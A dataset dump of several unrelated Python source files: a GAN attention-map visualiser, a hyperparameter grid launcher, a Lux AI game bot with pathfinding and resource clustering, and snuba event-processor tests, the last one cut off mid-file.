filename
stringlengths
13
19
text
stringlengths
134
1.04M
the-stack_106_24257
"""Adapted from: https://github.com/mrlibw/ControlGAN""" import numpy as np import torch import torch.nn as nn import skimage.transform from PIL import Image, ImageDraw, ImageFont def normalize(similarities, method="norm"): if method == "norm": return (similarities - similarities.mean(axis=0)) / (similarities.std(axis=0)) elif method == "standardize": return (similarities - similarities.min(axis=0)) / ( similarities.max(axis=0) - similarities.min(axis=0) ) else: raise Exception("normalizing method not implemented") # For visualization ################################################ COLOR_DIC = { 0: [128, 64, 128], 1: [244, 35, 232], 2: [70, 70, 70], 3: [102, 102, 156], 4: [190, 153, 153], 5: [153, 153, 153], 6: [250, 170, 30], 7: [220, 220, 0], 8: [107, 142, 35], 9: [152, 251, 152], 10: [70, 130, 180], 11: [220, 20, 60], 12: [255, 0, 0], 13: [0, 0, 142], 14: [119, 11, 32], 15: [0, 60, 100], 16: [0, 80, 100], 17: [0, 0, 230], 18: [0, 0, 70], 19: [0, 0, 0], 20: [128, 64, 128], 21: [244, 35, 232], 22: [70, 70, 70], 23: [102, 102, 156], 24: [190, 153, 153], 25: [153, 153, 153], 26: [250, 170, 30], 27: [220, 220, 0], 28: [107, 142, 35], 29: [152, 251, 152], 30: [70, 130, 180], 31: [220, 20, 60], 32: [255, 0, 0], 33: [0, 0, 142], 34: [119, 11, 32], 35: [0, 60, 100], 36: [0, 80, 100], 37: [0, 0, 230], 38: [0, 0, 70], 39: [0, 0, 0], 40: [128, 64, 128], 41: [244, 35, 232], 42: [70, 70, 70], 43: [102, 102, 156], 44: [190, 153, 153], 45: [153, 153, 153], 46: [250, 170, 30], 47: [220, 220, 0], 48: [107, 142, 35], 49: [152, 251, 152], 50: [70, 130, 180], 51: [220, 20, 60], 52: [255, 0, 0], 53: [0, 0, 142], 54: [119, 11, 32], 55: [0, 60, 100], 56: [0, 80, 100], 57: [0, 0, 230], 58: [0, 0, 70], 59: [0, 0, 0], 60: [128, 64, 128], 61: [244, 35, 232], 62: [70, 70, 70], 63: [102, 102, 156], 64: [190, 153, 153], 65: [153, 153, 153], 66: [250, 170, 30], 67: [220, 220, 0], 68: [107, 142, 35], 69: [152, 251, 152], 70: [70, 130, 180], 71: [220, 20, 60], 72: [255, 0, 0], 73: [0, 0, 142], 74: [119, 11, 32], 75: [0, 60, 100], 76: [0, 80, 100], 77: [0, 0, 230], 78: [0, 0, 70], 79: [0, 0, 0], 80: [128, 64, 128], 81: [244, 35, 232], 82: [70, 70, 70], 83: [102, 102, 156], 84: [190, 153, 153], 85: [153, 153, 153], 86: [250, 170, 30], 87: [220, 220, 0], 88: [107, 142, 35], 89: [152, 251, 152], 90: [70, 130, 180], 91: [220, 20, 60], 92: [255, 0, 0], 93: [0, 0, 142], 94: [119, 11, 32], 95: [0, 60, 100], 96: [0, 80, 100], 97: [0, 0, 230], 98: [0, 0, 70], 99: [0, 0, 0], } FONT_MAX = 50 def drawCaption(convas, vis_size, sents, off1=2, off2=2): img_txt = Image.fromarray(convas) fnt = ImageFont.truetype("./FreeMono.ttf", 45) d = ImageDraw.Draw(img_txt) sentence_list = [] word_index_list = [] for i in range(len(sents)): # cap = captions[i].data.cpu().numpy() cap = [w for w in sents[i] if not w.startswith("[")] cap = ["[CLS]"] + cap sentence = [] word_index = [] word = "" for j in range(len(cap)): word += sents[i][j].strip("#") if j == (len(cap)) - 1: word_index.append(j) else: if sents[i][j + 1].startswith("#"): continue else: word_index.append(j) d.text( ((len(sentence) + off1) * (vis_size + off2), i * FONT_MAX), "%s" % (word), font=fnt, fill=(255, 255, 255, 255), ) sentence.append(word) word = "" sentence_list.append(sentence) word_index_list.append(word_index) return img_txt, sents, word_index_list def build_attention_images( real_imgs, attn_maps, max_word_num=None, # TODO: remove nvis=8, rand_vis=False, sentences=None, ): att_sze = attn_maps[0].shape[-1] batch_size = real_imgs.shape[0] word_counts = [] for sent in sentences: sent = [s for s in sent if (not s.startswith("#")) and (not s.startswith("["))] word_counts.append(len(sent) + 1) max_word_num = max(word_counts) if rand_vis: loop_idx = np.random.choice(len(real_imgs), size=nvis, replace=False) else: loop_idx = np.arange(nvis) if (att_sze == 17) or (att_sze == 19): vis_size = att_sze * 16 else: vis_size = real_imgs.size(2) text_convas = np.ones( [batch_size * FONT_MAX, (max_word_num + 2) * (vis_size + 2), 3], dtype=np.uint8 ) for i in range(max_word_num): istart = (i + 2) * (vis_size + 2) iend = (i + 3) * (vis_size + 2) text_convas[:, istart:iend, :] = COLOR_DIC[i] real_imgs = nn.Upsample(size=(vis_size, vis_size), mode="bilinear")(real_imgs) # [-1, 1] --> [0, 1] real_imgs.add_(1).div_(2).mul_(255) real_imgs = real_imgs.data.numpy() # b x c x h x w --> b x h x w x c real_imgs = np.transpose(real_imgs, (0, 2, 3, 1)) pad_sze = real_imgs.shape middle_pad = np.zeros([pad_sze[2], 2, 3]) post_pad = np.zeros([pad_sze[1], pad_sze[2], 3]) # batch x seq_len x 17 x 17 --> batch x 1 x 17 x 17 seq_len = max_word_num img_set = [] num = nvis # len(attn_maps) text_map, sentences, word_index_list = drawCaption(text_convas, vis_size, sentences) text_map = np.asarray(text_map).astype(np.uint8) bUpdate = 1 for i in loop_idx: attn = attn_maps[i].cpu().view(1, -1, att_sze, att_sze) # --> 1 x 1 x 17 x 17 attn_max = attn.max(dim=1, keepdim=True) attn = torch.cat([attn_max[0], attn], 1) attn = attn.view(-1, 1, att_sze, att_sze) attn = attn.repeat(1, 3, 1, 1).data.numpy() # n x c x h x w --> n x h x w x c attn = np.transpose(attn, (0, 2, 3, 1)) num_attn = attn.shape[0] # img = real_imgs[i] lrI = img row = [lrI, middle_pad] row_merge = [img, middle_pad] row_beforeNorm = [] minVglobal, maxVglobal = 1, 0 # including first max attention index word_end_list = [0] + [idx + 1 for idx in word_index_list[i]] word_level_attn = [] for j in range(num_attn): one_map = attn[j] if (vis_size // att_sze) > 1: one_map = skimage.transform.pyramid_expand( one_map, sigma=20, upscale=vis_size // att_sze, multichannel=True ) word_level_attn.append(one_map) if j in word_end_list: one_map = np.mean(word_level_attn, axis=0) word_level_attn = [] else: continue row_beforeNorm.append(one_map) minV = one_map.min() maxV = one_map.max() if minVglobal > minV: minVglobal = minV if maxVglobal < maxV: maxVglobal = maxV for j in range(seq_len + 1): if j < len(row_beforeNorm): one_map = row_beforeNorm[j] one_map = (one_map - minVglobal) / (maxVglobal - minVglobal) one_map *= 255 PIL_im = Image.fromarray(np.uint8(img)) PIL_att = Image.fromarray(np.uint8(one_map)) merged = Image.new("RGBA", (vis_size, vis_size), (0, 0, 0, 0)) mask = Image.new("L", (vis_size, vis_size), (210)) merged.paste(PIL_im, (0, 0)) merged.paste(PIL_att, (0, 0), mask) merged = np.array(merged)[:, :, :3] else: one_map = post_pad merged = post_pad row.append(one_map) row.append(middle_pad) row_merge.append(merged) row_merge.append(middle_pad) row = np.concatenate(row, 1) row_merge = np.concatenate(row_merge, 1) txt = text_map[i * FONT_MAX : (i + 1) * FONT_MAX] if txt.shape[1] != row.shape[1]: print("txt", txt.shape, "row", row.shape) bUpdate = 0 break row = np.concatenate([txt, row, row_merge], 0) img_set.append(row) if bUpdate: img_set = np.concatenate(img_set, 0) img_set = img_set.astype(np.uint8) return img_set, sentences else: return None
the-stack_106_24258
import os def combine(x): so_far = [] for i in x[0]: if len(x) > 1: for j in combine(x[1:]): so_far.append(' '.join([i, j])) else: so_far.append(i) return so_far args = [ ['100'], ['0'], ['0.5', '1'], ['0.4', '0.8'], ['0.97', '0.99'] ] for idx, arg in enumerate(combine(args)): os.system('python3 train_model.py {} {}'.format(idx, arg))
the-stack_106_24262
import time import heapq from collections import defaultdict, deque from typing import DefaultDict, Dict, List, Tuple, Set import numpy as np from .constants import Constants from .game_map import GameMap, RESOURCE_TYPES from .game_objects import Player, Unit, City, CityTile from .game_position import Position from .game_constants import GAME_CONSTANTS INPUT_CONSTANTS = Constants.INPUT_CONSTANTS class Mission: def __init__(self, unit_id: str, target_position: Position, target_action: str = ""): self.target_position: Position = target_position self.target_action: str = target_action self.unit_id: str = unit_id self.delays: int = 0 # [TODO] some expiry date for each mission def __str__(self): return " ".join([str(self.target_position), self.target_action]) class Missions(defaultdict): def __init__(self): self: DefaultDict[str, Mission] = defaultdict(Mission) def add(self, mission: Mission): self[mission.unit_id] = mission def cleanup(self, player: Player, player_city_tile_xy_set: Set[Tuple], opponent_city_tile_xy_set: Set[Tuple], convolved_collectable_tiles_xy_set: Set[Tuple]): # probably should be a standalone function instead of a method for unit_id in list(self.keys()): mission: Mission = self[unit_id] # if dead, delete from list if unit_id not in player.units_by_id: del self[unit_id] continue unit: Unit = player.units_by_id[unit_id] # if you want to build city without resource, delete from list if mission.target_action and mission.target_action[:5] == "bcity": if unit.cargo == 0: del self[unit_id] continue # if opponent has already built a base, reconsider your mission if tuple(mission.target_position) in opponent_city_tile_xy_set: del self[unit_id] continue # if you are in a base, reconsider your mission if tuple(unit.pos) in player_city_tile_xy_set: del self[unit_id] continue # if your target no longer have resource, reconsider your mission if tuple(mission.target_position) not in convolved_collectable_tiles_xy_set: del self[unit_id] continue def __str__(self): return " ".join([unit_id + " " + str(x) for unit_id,x in self.items()]) def get_targets(self): return [mission.target_position for unit_id, mission in self.items()] def get_targets_and_actions(self): return [(mission.target_position, mission.target_action) for unit_id, mission in self.items()] class DisjointSet: def __init__(self): self.parent = {} self.sizes = defaultdict(int) self.points = defaultdict(int) # tracks resource pile size self.num_sets = 0 def find(self, a, point=0): if a not in self.parent: self.parent[a] = a self.sizes[a] += 1 self.points[a] += point self.num_sets += 1 acopy = a while a != self.parent[a]: a = self.parent[a] while acopy != a: self.parent[acopy], acopy = a, self.parent[acopy] return a def union(self, a, b): a, b = self.find(a), self.find(b) if a != b: if self.sizes[a] < self.sizes[b]: a, b = b, a self.num_sets -= 1 self.parent[b] = a self.sizes[a] += self.sizes[b] self.points[a] += self.points[b] def get_size(self, a): return self.sizes[self.find(a)] def get_point(self, a): return self.points[self.find(a)] def get_groups(self): groups = defaultdict(list) for element in self.parent: leader = self.find(element) if leader: groups[leader].append(element) return groups def get_group_count(self): return sum(self.points[leader] > 1 for leader in self.get_groups().keys()) class Game: # counted from the time after the objects are saved to disk compute_start_time = -1 def _initialize(self, messages): """ initialize state """ self.player_id: int = int(messages[0]) self.turn: int = -1 # get some other necessary initial input mapInfo = messages[1].split(" ") self.map_width: int = int(mapInfo[0]) self.map_height: int = int(mapInfo[1]) self.map: GameMap = GameMap(self.map_width, self.map_height) self.players: List[Player] = [Player(0), Player(1)] self.x_iteration_order = list(range(self.map_width)) self.y_iteration_order = list(range(self.map_height)) self.dirs: List = [ Constants.DIRECTIONS.NORTH, Constants.DIRECTIONS.EAST, Constants.DIRECTIONS.SOUTH, Constants.DIRECTIONS.WEST, Constants.DIRECTIONS.CENTER ] self.dirs_dxdy: List = [(0,-1), (1,0), (0,1), (-1,0), (0,0)] def fix_iteration_order(self): ''' Fix iteration order at initisation to allow moves to be symmetric ''' assert len(self.player.cities) == 1 assert len(self.opponent.cities) == 1 px,py = tuple(list(self.player.cities.values())[0].citytiles[0].pos) ox,oy = tuple(list(self.opponent.cities.values())[0].citytiles[0].pos) flipping = False self.y_order_coefficient = 1 self.x_order_coefficient = 1 if px == ox: if py < oy: flipping = True self.y_iteration_order = self.y_iteration_order[::-1] self.y_order_coefficient = -1 idx1, idx2 = 0,2 elif py == oy: if px < ox: flipping = True self.x_iteration_order = self.x_iteration_order[::-1] self.x_order_coefficient = -1 idx1, idx2 = 1,3 else: assert False if flipping: self.dirs[idx1], self.dirs[idx2] = self.dirs[idx2], self.dirs[idx1] self.dirs_dxdy[idx1], self.dirs_dxdy[idx2] = self.dirs_dxdy[idx2], self.dirs_dxdy[idx1] def _end_turn(self): print("D_FINISH") def _reset_player_states(self): self.players[0].units = [] self.players[0].cities = {} self.players[0].city_tile_count = 0 self.players[1].units = [] self.players[1].cities = {} self.players[1].city_tile_count = 0 self.player: Player = self.players[self.player_id] self.opponent: Player = self.players[1 - self.player_id] def _update(self, messages): """ update state """ self.map = GameMap(self.map_width, self.map_height) self.turn += 1 self._reset_player_states() for update in messages: if update == "D_DONE": break strs = update.split(" ") input_identifier = strs[0] if input_identifier == INPUT_CONSTANTS.RESEARCH_POINTS: team = int(strs[1]) # probably player_id self.players[team].research_points = int(strs[2]) elif input_identifier == INPUT_CONSTANTS.RESOURCES: r_type = strs[1] x = int(strs[2]) y = int(strs[3]) amt = int(float(strs[4])) self.map._setResource(r_type, x, y, amt) elif input_identifier == INPUT_CONSTANTS.UNITS: unittype = int(strs[1]) team = int(strs[2]) unitid = strs[3] x = int(strs[4]) y = int(strs[5]) cooldown = float(strs[6]) wood = int(strs[7]) coal = int(strs[8]) uranium = int(strs[9]) unit = Unit(team, unittype, unitid, x, y, cooldown, wood, coal, uranium) self.players[team].units.append(unit) self.map.get_cell(x, y).unit = unit elif input_identifier == INPUT_CONSTANTS.CITY: team = int(strs[1]) cityid = strs[2] fuel = float(strs[3]) lightupkeep = float(strs[4]) self.players[team].cities[cityid] = City(team, cityid, fuel, lightupkeep) elif input_identifier == INPUT_CONSTANTS.CITY_TILES: team = int(strs[1]) cityid = strs[2] x = int(strs[3]) y = int(strs[4]) cooldown = float(strs[5]) city = self.players[team].cities[cityid] citytile = city._add_city_tile(x, y, cooldown) self.map.get_cell(x, y).citytile = citytile self.players[team].city_tile_count += 1 elif input_identifier == INPUT_CONSTANTS.ROADS: x = int(strs[1]) y = int(strs[2]) road = float(strs[3]) self.map.get_cell(x, y).road = road # create indexes to refer to unit by id self.player.make_index_units_by_id() self.opponent.make_index_units_by_id() def calculate_features(self, missions: Missions): # load constants into object self.wood_fuel_rate = GAME_CONSTANTS["PARAMETERS"]["RESOURCE_TO_FUEL_RATE"][RESOURCE_TYPES.WOOD.upper()] self.wood_collection_rate = GAME_CONSTANTS["PARAMETERS"]["WORKER_COLLECTION_RATE"][RESOURCE_TYPES.WOOD.upper()] self.coal_fuel_rate = GAME_CONSTANTS["PARAMETERS"]["RESOURCE_TO_FUEL_RATE"][RESOURCE_TYPES.COAL.upper()] self.coal_collection_rate = GAME_CONSTANTS["PARAMETERS"]["WORKER_COLLECTION_RATE"][RESOURCE_TYPES.COAL.upper()] self.uranium_fuel_rate = GAME_CONSTANTS["PARAMETERS"]["RESOURCE_TO_FUEL_RATE"][RESOURCE_TYPES.URANIUM.upper()] self.uranium_collection_rate = GAME_CONSTANTS["PARAMETERS"]["WORKER_COLLECTION_RATE"][RESOURCE_TYPES.URANIUM.upper()] # [TODO] Use constants here self.night_turns_left = (360 - self.turn)//40 * 10 + min(10, (360 - self.turn)%40) self.turns_to_night = (30 - self.turn)%40 self.turns_to_night = 0 if self.turns_to_night > 30 else self.turns_to_night self.turns_to_dawn = (40 - self.turn%40) self.turns_to_dawn = 0 if self.turns_to_dawn > 10 else self.turns_to_dawn self.is_day_time = self.turns_to_dawn == 0 # update matrices self.calculate_matrix() self.calculate_resource_matrix() self.calculate_resource_groups() self.calculate_distance_matrix() self.repopulate_targets(missions) self.heuristics_from_positions: Dict = dict() def init_matrix(self, default_value=0): # [TODO] check if order of map_height and map_width is correct return np.full((self.map_height,self.map_width), default_value) def calculate_matrix(self): # amount of resources left on the tile self.wood_amount_matrix = self.init_matrix() self.coal_amount_matrix = self.init_matrix() self.uranium_amount_matrix = self.init_matrix() self.all_resource_amount_matrix = self.init_matrix() self.player_city_tile_matrix = self.init_matrix() self.opponent_city_tile_matrix = self.init_matrix() self.player_units_matrix = self.init_matrix() self.opponent_units_matrix = self.init_matrix() # if there is nothing on tile self.empty_tile_matrix = self.init_matrix() # if you can build on tile (a unit may be on the tile) self.buildable_tile_matrix = self.init_matrix() for y in self.y_iteration_order: for x in self.x_iteration_order: cell = self.map.get_cell(x, y) is_empty = True is_buildable = True if cell.unit: is_empty = False if cell.unit.team == self.player_id: self.player_units_matrix[y,x] += 1 else: # unit belongs to opponent self.opponent_units_matrix[y,x] += 1 if cell.has_resource(): is_empty = False is_buildable = False if cell.resource.type == RESOURCE_TYPES.WOOD: self.wood_amount_matrix[y,x] += cell.resource.amount if cell.resource.type == RESOURCE_TYPES.COAL: self.coal_amount_matrix[y,x] += cell.resource.amount if cell.resource.type == RESOURCE_TYPES.URANIUM: self.uranium_amount_matrix[y,x] += cell.resource.amount self.all_resource_amount_matrix[y,x] += cell.resource.amount elif cell.citytile: is_empty = False is_buildable = False if cell.citytile.team == self.player_id: self.player_city_tile_matrix[y,x] += 1 else: # city tile belongs to opponent self.opponent_city_tile_matrix[y,x] += 1 if is_empty: self.empty_tile_matrix[y,x] += 1 if is_buildable: self.buildable_tile_matrix[y,x] += 1 # binary matrices self.wood_exist_matrix = (self.wood_amount_matrix > 0).astype(int) self.coal_exist_matrix = (self.coal_amount_matrix > 0).astype(int) self.uranium_exist_matrix = (self.uranium_amount_matrix > 0).astype(int) self.all_resource_exist_matrix = (self.all_resource_amount_matrix > 0).astype(int) # positive if on empty cell and beside the resource self.wood_side_matrix = self.convolve(self.wood_exist_matrix) * self.empty_tile_matrix self.coal_side_matrix = self.convolve(self.coal_exist_matrix) * self.empty_tile_matrix self.uranium_side_matrix = self.convolve(self.uranium_exist_matrix) * self.empty_tile_matrix self.convert_into_sets() def populate_set(self, matrix, set_object): # modifies the set_object in place and add nonzero items in the matrix for y in self.y_iteration_order: for x in self.x_iteration_order: if matrix[y,x] > 0: set_object.add((x,y)) def convert_into_sets(self): self.wood_exist_xy_set = set() self.coal_exist_xy_set = set() self.uranium_exist_xy_set = set() self.player_city_tile_xy_set = set() self.opponent_city_tile_xy_set = set() self.player_units_xy_set = set() self.opponent_units_xy_set = set() self.empty_tile_xy_set = set() self.buildable_tile_xy_set = set() for set_object, matrix in [ [self.wood_exist_xy_set, self.wood_exist_matrix], [self.coal_exist_xy_set, self.coal_exist_matrix], [self.uranium_exist_xy_set, self.uranium_exist_matrix], [self.player_city_tile_xy_set, self.player_city_tile_matrix], [self.opponent_city_tile_xy_set, self.opponent_city_tile_matrix], [self.player_units_xy_set, self.player_units_matrix], [self.opponent_units_xy_set, self.opponent_units_matrix], [self.empty_tile_xy_set, self.empty_tile_matrix], [self.buildable_tile_xy_set, self.buildable_tile_matrix]]: self.populate_set(matrix, set_object) self.xy_out_of_map: Set = set() for y in [-1, self.map_height]: for x in range(self.map_width): self.xy_out_of_map.add((x,y)) for y in range(self.map_height): for x in [-1, self.map_width]: self.xy_out_of_map.add((x,y)) # used for distance calculation # out of map - yes # occupied by enemy units or city - yes # occupied by self unit not in city - yes # occupied by self city - no (even if there are units) self.occupied_xy_set = (self.player_units_xy_set | self.opponent_units_xy_set | \ self.opponent_city_tile_xy_set | self.xy_out_of_map) \ - self.player_city_tile_xy_set def calculate_distance_matrix(self, blockade_multiplier_value=100): self.distance_from_edge = self.init_matrix(self.map_height + self.map_width) for y in range(self.map_height): y_distance_from_edge = min(y, self.map_height-y-1) for x in range(self.map_width): x_distance_from_edge = min(x, self.map_height-x-1) self.distance_from_edge[y,x] = y_distance_from_edge + x_distance_from_edge def calculate_distance_from_set(relevant_set): visited = set() matrix = self.init_matrix(default_value=-1) for y in self.y_iteration_order: for x in self.x_iteration_order: if (x,y) in relevant_set: visited.add((x,y)) matrix[y,x] = 0 queue = deque(list(visited)) while queue: x,y = queue.popleft() for dx,dy in [(0,1), (1,0), (0,-1), (-1,0)]: xx, yy = x+dx, y+dy if (xx,yy) in visited: continue if 0 <= xx < self.map_width and 0 <= yy < self.map_height: matrix[yy,xx] = matrix[y,x] + 1 queue.append((xx,yy)) visited.add((xx,yy)) return matrix # calculate distance from resource (with fulfilled research requirements) self.distance_from_collectable_resource = calculate_distance_from_set(self.collectable_tiles_xy_set) # calculate distance from city or tiles self.distance_from_player_assets = calculate_distance_from_set(self.player_units_xy_set | self.player_city_tile_xy_set) self.distance_from_opponent_assets = calculate_distance_from_set(self.opponent_units_xy_set | self.opponent_city_tile_xy_set) self.distance_from_buildable_tile = calculate_distance_from_set(self.buildable_tile_xy_set) # calculating distances from every unit positions and its adjacent positions # avoid blocked places as much as possible self.positions_to_calculate_distances_from = set() for unit in self.player.units: x,y = tuple(unit.pos) self.positions_to_calculate_distances_from.add((x,y),) if unit.can_act(): self.positions_to_calculate_distances_from.add((x+1,y),) self.positions_to_calculate_distances_from.add((x-1,y),) self.positions_to_calculate_distances_from.add((x,y+1),) self.positions_to_calculate_distances_from.add((x,y-1),) self.distance_matrix = np.full((self.map_height,self.map_width,self.map_height,self.map_width), 1001) for sy in range(self.map_height): for sx in range(self.map_width): if (sx,sy) not in self.positions_to_calculate_distances_from: continue blockade_multiplier_value_for_syx = blockade_multiplier_value if (sx,sy) in self.player_units_xy_set: blockade_multiplier_value_for_syx = 1 start_pos = (sx,sy) xy_processed = set() d4 = [(1,0),(0,1),(-1,0),(0,-1)] heap = [(0, start_pos),] while heap: curdist, (x,y) = heapq.heappop(heap) if (x,y) in xy_processed: continue xy_processed.add((x,y),) self.distance_matrix[sy,sx,y,x] = curdist for dx,dy in d4: xx,yy = x+dx,y+dy if not (0 <= xx < self.map_width and 0 <= yy < self.map_height): continue if (xx,yy) in xy_processed: continue edge_length = 1 if (xx,yy) in self.occupied_xy_set: edge_length = blockade_multiplier_value_for_syx if (xx,yy) in self.player_city_tile_xy_set: edge_length = blockade_multiplier_value_for_syx heapq.heappush(heap, (curdist + edge_length, (xx,yy))) def retrieve_distance(self, sx, sy, ex, ey): return self.distance_matrix[sy,sx,ey,ex] def convolve(self, matrix): # each worker gets resources from (up to) five tiles new_matrix = matrix.copy() new_matrix[:-1,:] += matrix[1:,:] new_matrix[:,:-1] += matrix[:,1:] new_matrix[1:,:] += matrix[:-1,:] new_matrix[:,1:] += matrix[:,:-1] return new_matrix def calculate_resource_matrix(self): # calculate value of the resource considering the reasearch level self.collectable_tiles_matrix = self.wood_exist_matrix if self.player.researched_coal(): self.collectable_tiles_matrix += self.coal_exist_matrix if self.player.researched_uranium(): self.collectable_tiles_matrix += self.uranium_exist_matrix # adjacent cells collect from the cell as well self.convolved_collectable_tiles_matrix = self.convolve(self.collectable_tiles_matrix) self.collectable_tiles_xy_set = set() # exclude adjacent self.populate_set(self.collectable_tiles_matrix, self.collectable_tiles_xy_set) self.convolved_collectable_tiles_xy_set = set() # include adjacent self.populate_set(self.convolved_collectable_tiles_matrix, self.convolved_collectable_tiles_xy_set) def calculate_resource_groups(self): # compute join the resource cluster and calculate the amount of resource self.xy_to_resource_group_id: DisjointSet = DisjointSet() for y in self.y_iteration_order: for x in self.x_iteration_order: if (x,y) in self.collectable_tiles_xy_set: if (x,y) in self.wood_exist_xy_set or (x,y) in self.uranium_exist_xy_set: self.xy_to_resource_group_id.find((x,y), point=5) else: self.xy_to_resource_group_id.find((x,y), point=1) for y in self.y_iteration_order: for x in self.x_iteration_order: if (x,y) in self.collectable_tiles_xy_set: for dy,dx in [(1,0),(0,1),(-1,0),(0,-1)]: xx, yy = x+dx, y+dy if 0 <= yy < self.map_height and 0 <= xx < self.map_width: self.xy_to_resource_group_id.union((x,y), (xx,yy)) def repopulate_targets(self, missions: Missions): # with missions, populate the following objects for use # probably these attributes belong to missions, but left it here to avoid circular imports pos_list = missions.get_targets() self.targeted_leaders: Set = set(self.xy_to_resource_group_id.find(tuple(pos)) for pos in pos_list) self.targeted_cluster_count = sum(self.xy_to_resource_group_id.get_point((x,y)) > 0 for x,y in self.targeted_leaders) self.targeted_xy_set: Set = set(tuple(pos) for pos in pos_list) - self.player_city_tile_xy_set pos_and_action_list = missions.get_targets_and_actions() self.targeted_for_building_xy_set: Set = \ set(tuple(pos) for pos,action in pos_and_action_list if action and action[:5] == "bcity") - self.player_city_tile_xy_set self.resource_leader_to_locating_units: DefaultDict[Tuple, Set[str]] = defaultdict(set) for unit_id in self.player.units_by_id: unit: Unit = self.player.units_by_id[unit_id] current_position = tuple(unit.pos) leader = self.xy_to_resource_group_id.find(current_position) if leader: self.resource_leader_to_locating_units[leader].add(unit_id) self.resource_leader_to_targeting_units: DefaultDict[Tuple, Set[str]] = defaultdict(set) for unit_id in missions: mission: Mission = missions[unit_id] target_position = tuple(mission.target_position) leader = self.xy_to_resource_group_id.find(target_position) if leader: self.resource_leader_to_targeting_units[leader].add(unit_id) def get_nearest_empty_tile_and_distance(self, current_position: Position, current_target: Position=None) -> Tuple[Position, int]: if self.all_resource_amount_matrix[current_position.y, current_position.x] == 0: if tuple(current_position) not in self.player_city_tile_xy_set: return current_position, 0 nearest_distance = 10**9+7 nearest_position: Position = current_position for y in self.y_iteration_order: for x in self.x_iteration_order: if (x,y) not in self.buildable_tile_xy_set: continue if (x,y) in self.targeted_for_building_xy_set: # we allow units to build at a tile that is targeted but not for building if current_target and (x,y) != tuple(current_target): continue # only build beside a collectable resource if self.distance_from_collectable_resource[y,x] != 1: continue position = Position(x, y) distance = self.retrieve_distance(current_position.x, current_position.y, position.x, position.y) # update best location if distance < nearest_distance: nearest_distance = distance nearest_position = position return nearest_position, nearest_distance
the-stack_106_24263
import calendar import pytest from collections import OrderedDict from datetime import datetime, timedelta from tests.base import BaseEventsTest from snuba import settings from snuba.datasets.factory import enforce_table_writer from snuba.processor import ( InvalidMessageType, InvalidMessageVersion, ProcessedMessage, ProcessorAction, ) from snuba.datasets.events_processor import ( enforce_retention, extract_base, extract_extra_contexts, extract_extra_tags, extract_user ) class TestEventsProcessor(BaseEventsTest): def test_simple(self): processed = enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message(self.event) for field in ('event_id', 'project_id', 'message', 'platform'): assert processed.data[0][field] == self.event[field] def test_simple_version_0(self): processed = enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((0, 'insert', self.event)) for field in ('event_id', 'project_id', 'message', 'platform'): assert processed.data[0][field] == self.event[field] def test_simple_version_1(self): processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message((0, 'insert', self.event)) == processor.process_message((1, 'insert', self.event, {})) def test_invalid_type_version_0(self): with pytest.raises(InvalidMessageType): enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((0, 'invalid', self.event)) def test_invalid_version(self): with pytest.raises(InvalidMessageVersion): enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((2 ** 32 - 1, 'insert', self.event)) def test_invalid_format(self): with pytest.raises(InvalidMessageVersion): enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((-1, 'insert', self.event)) def test_unexpected_obj(self): self.event['message'] = {'what': 'why is this in the message'} processed = enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message(self.event) assert processed.data[0]['message'] == '{"what": "why is this in the message"}' def test_hash_invalid_primary_hash(self): self.event['primary_hash'] = b"'tinymce' \u063a\u064a\u0631 \u0645\u062d".decode('unicode-escape') processed = enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message(self.event) assert processed.data[0]['primary_hash'] == 'a52ccc1a61c2258e918b43b5aff50db1' def test_extract_required(self): now = datetime.utcnow() event = { 'event_id': '1' * 32, 'project_id': 100, 'group_id': 10, 'datetime': now.strftime("%Y-%m-%dT%H:%M:%S.%fZ"), } output = {} extract_base(output, event) output["retention_days"] = enforce_retention( event, datetime.strptime(event['datetime'], settings.PAYLOAD_DATETIME_FORMAT) ) enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_required(output, event) assert output == { 'event_id': '11111111111111111111111111111111', 'project_id': 100, 'group_id': 10, 'timestamp': now, 'retention_days': settings.DEFAULT_RETENTION_DAYS, } def test_extract_common(self): now = datetime.utcnow().replace(microsecond=0) event = { 'primary_hash': 'a' * 32, 'message': 'the message', 'platform': 'the_platform', } data = { 'received': int(calendar.timegm(now.timetuple())), 'culprit': 'the culprit', 'type': 'error', 'version': 6, 'title': 'FooError', 'location': 'bar.py', 'modules': OrderedDict([ ('foo', '1.0'), ('bar', '2.0'), ('baz', None), ]) } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_common(output, event, data) assert output == { 'message': u'the message', 'platform': u'the_platform', 'primary_hash': 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', 'received': now, 'culprit': 'the culprit', 'type': 'error', 'version': '6', 'modules.name': [u'foo', u'bar', u'baz'], 'modules.version': [u'1.0', u'2.0', u''], 'title': 'FooError', 'location': 'bar.py', 'search_message': None, } def test_extract_common_search_message(self): now = datetime.utcnow().replace(microsecond=0) event = { 'primary_hash': 'a' * 32, 'message': 'the message', 'platform': 'the_platform', 'search_message': 'the search message', } data = { 'received': int(calendar.timegm(now.timetuple())), } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_common(output, event, data) assert output['search_message'] == 'the search message' # with optional short message now = datetime.utcnow().replace(microsecond=0) event = { 'primary_hash': 'a' * 32, 'message': 'the message', 'platform': 'the_platform', 'search_message': 'the search message', } data = { 'received': int(calendar.timegm(now.timetuple())), 'message': 'the short message', } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_common(output, event, data) assert output['search_message'] == 'the search message' assert output['message'] == 'the short message' def test_v1_delete_groups_skipped(self): assert enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((1, 'delete_groups', {})) is None def test_v1_merge_skipped(self): assert enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((1, 'merge', {})) is None def test_v1_unmerge_skipped(self): assert enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((1, 'unmerge', {})) is None def test_v2_invalid_type(self): with pytest.raises(InvalidMessageType): assert enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((2, '__invalid__', {})) == 1 def test_v2_start_delete_groups(self): project_id = 1 message = (2, 'start_delete_groups', {'project_id': project_id}) processor = 